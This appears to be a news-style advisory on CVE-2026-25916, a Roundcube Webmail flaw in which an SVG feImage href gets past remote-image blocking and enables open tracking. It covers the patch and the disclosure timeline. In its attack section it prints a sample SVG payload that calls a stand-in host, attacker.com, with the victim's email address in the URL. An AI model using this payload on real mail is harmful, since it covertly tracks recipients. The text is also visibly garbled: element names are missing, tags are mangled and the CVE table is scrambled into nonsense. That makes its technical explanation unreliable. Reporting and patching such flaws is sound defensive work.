Even when "Block remote images" is enabled, a Roundcube Webmail vulnerability exposes users to covert tracking, circumventing email security measures. This problem (CVE-2026-25916), which was found during holiday tinkering, impacts versions prior to 1.5.13 and 1.6.13. Without your knowledge, attackers can now verify whether you have opened their emails by recording your IP address and browser information.

The Issue in Simple Terms The HTML sanitizer from Roundcube functions similarly to a club bouncer. , , and are common locations where it blocks external images. When remote loading is disabled, these checks use a strict function called is_image_attribute() to reject external URLs. However, the SVG element managed to get through.

Instead of pulling in remote images for filters, its href attribute is interpreted as a harmless link. It is routed by the sanitizer using wash_link(), which supports HTTP/HTTPS URLs. Outcome?

Bypassing the block, browsers stealthily retrieve the attacker's image. While auditing recent SVG fixes in Roundcube's rcube_washtml.php, security researcher "nullcathedral" discovered this. Since renders like a but avoids the image checks, it stood out as one of the many SVG bugs that frequently hint at more. How Attackers Take Advantage of It Picture getting this malicious HTML in an email: text \defs> \filter id="t"> \feImage href="https://attacker.com/track?email=victim@test.com" width="1" height="1"/> \rect filter="url(#t)" width="1" height="1"/> It is a small SVG that is off-screen.

The browser pings the attacker's server by grabbing the href image when it is rendered.

Simply opening the email initiates it; no click is necessary. Ideal for tracking spam or phishing campaigns. Details of CVE CVE Field Value CVE-2026-25916 Roundcube, the vendor Roundcube is the product.

Webmail Versions <1.5.13 and <1.6.13 are affected. Date of Disclosure 2026-02-08 It was quickly patched by developers. The update uses a regex to modify is_image_attribute(): ($attr == 'href' && preg_match('/^(feimage\|image\|use)$/i', $tag)). Like other images, is now blocked.

2026-01-04: Roundcube was notified. Versions 1.5.13 and 1.6.13 were released on 2026-02-08. CVE assigned 2026-02-09. Email tracking helps targeted attacks by circumventing privacy settings.

Webmail administrators: Update right away. Users: Examine senders and enable image blocking. This demonstrates how specialized SVG peculiarities can compromise general defenses.